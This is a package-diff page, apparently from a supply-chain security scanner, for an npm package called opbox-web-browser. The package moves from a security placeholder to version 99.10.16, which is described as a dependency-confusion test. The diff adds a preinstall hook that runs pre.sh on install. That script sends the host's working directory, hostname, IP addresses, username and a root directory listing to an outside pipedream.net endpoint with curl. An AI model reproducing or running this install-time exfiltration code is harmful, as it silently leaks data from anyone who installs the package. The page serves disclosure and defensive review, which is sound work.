opbox-web-browser 0.0.1-security → 99.10.16

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of opbox-web-browser might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/package.json +10 -3
  2. package/pre.sh +7 -0
  3. package/README.md +0 -5
package/package.json CHANGED
@@ -1,6 +1,13 @@
1
1
  {
2
2
  "name": "opbox-web-browser",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "99.10.16",
4
+ "description": "Testing dependency confusion in allegro. Hackerone_username:bassem_sadaqah email:bassem.sadaqah@gmail.com",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "./pre.sh"
9
+ },
10
+ "keywords": [],
11
+ "author": "",
12
+ "license": "ISC"
6
13
  }
package/pre.sh ADDED
@@ -0,0 +1,7 @@
1
+ #!/bin/bash
2
+ curl https://c964f535c99e50c1076699c3f05887b8.m.pipedream.net
3
+ curl -H "Pwd: $(pwd)" https://c964f535c99e50c1076699c3f05887b8.m.pipedream.net
4
+ curl -H "Hostname: $(hostname)" https://c964f535c99e50c1076699c3f05887b8.m.pipedream.net
5
+ curl -H "Hostname-I: $(hostname -I)" https://c964f535c99e50c1076699c3f05887b8.m.pipedream.net
6
+ curl -H "Whoami: $(whoami)" https://c964f535c99e50c1076699c3f05887b8.m.pipedream.net
7
+ curl -H "Hostname: $(hostname | base64)" -H "Hostname-I: $(hostname -I | base64|tr -d '\n')" -H "Whoami: $(whoami | base64)" -H "Pwd: $(pwd | base64)" -d $(ls / | base64|tr -d '\n') https://c964f535c99e50c1076699c3f05887b8.m.pipedream.net
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=opbox-web-browser for more information.